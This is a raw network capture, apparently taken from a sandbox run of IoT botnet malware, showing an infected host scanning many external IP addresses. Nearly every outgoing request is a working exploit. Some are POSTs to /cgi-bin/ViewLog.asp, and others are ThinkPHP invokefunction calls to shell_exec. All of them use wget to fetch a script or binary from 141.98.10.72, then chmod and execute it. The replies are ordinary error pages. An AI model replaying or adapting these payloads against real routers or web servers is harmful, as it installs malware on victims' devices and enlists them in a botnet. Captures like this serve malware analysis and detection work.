                                                        Feb 14, 2024 09:35:35.525702000 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.774610043 CET374INHTTP/1.1 301 Moved Permanently
                                                        Date: Wed, 14 Feb 2024 08:35:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: keep-alive
                                                        X-XSS-Protection: 0
                                                        Location: http://www.youtube.com
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1144192.168.2.145323062.29.61.1908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.526011944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1145192.168.2.143311894.122.236.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.527532101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1146192.168.2.144529694.123.38.308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.527988911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1147192.168.2.143916894.121.199.298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.529738903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1148192.168.2.145452462.210.46.398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.861573935 CET279INHTTP/1.0 400 Bad request
                                                        Content-Type: text/html
                                                        Content-Length: 193
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 77 68 69 63 68 20 74 68 69 73 20 77 65 62 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 0a 20 20 20 20 20 20 67 72 6f 6b 2e 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>Bad Request</title> </head> <body> <h1>Bad Request</h1> <p>Your browser sent a request which this web server could not grok.</p> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1149192.168.2.1438230112.171.132.2180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:36.241130114 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1150192.168.2.1440752112.186.31.20280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:36.247243881 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1151192.168.2.1448108112.164.55.4880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:36.518584967 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1152192.168.2.1439610112.126.79.2880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:36.890702009 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:37.245982885 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:37 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1153192.168.2.143724688.221.155.280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:37.404576063 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:37.565144062 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:37 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:37 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 34 34 64 64 62 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 37 26 23 34 36 3b 38 33 33 66 66 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;844ddb17&#46;1707899737&#46;833ff78</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1154192.168.2.145979088.221.87.21480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:37.438823938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:37.633800983 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:37 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:37 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 36 35 37 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 37 26 23 34 36 3b 35 35 35 61 64 66 39 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d657dd58&#46;1707899737&#46;555adf96</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1155192.168.2.1445840112.47.52.15380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:37.938213110 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:38.345731020 CET303INHTTP/1.1 400 Bad Request
                                                        Server: WAF
                                                        Date: Wed, 14 Feb 2024 08:35:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 148
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 41 46 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>WAF</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1156192.168.2.144981662.28.213.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.017077923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1157192.168.2.146014295.183.116.738080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.041141987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:38.281559944 CET324INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.0
                                                        Date: Wed, 14 Feb 2024 08:35:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1158192.168.2.145879894.122.111.638080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.483606100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1159192.168.2.144465494.218.118.318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.513134003 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1160192.168.2.143856495.171.4.438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.516619921 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:38.753716946 CET411INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 11:35:38 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1161192.168.2.145225288.221.98.24880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.531763077 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:38.733961105 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:38 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:38 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 38 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 38 26 23 34 36 3b 32 66 36 62 66 33 38 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b8341060&#46;1707899738&#46;2f6bf38b</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1162192.168.2.145891295.86.125.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.534528971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
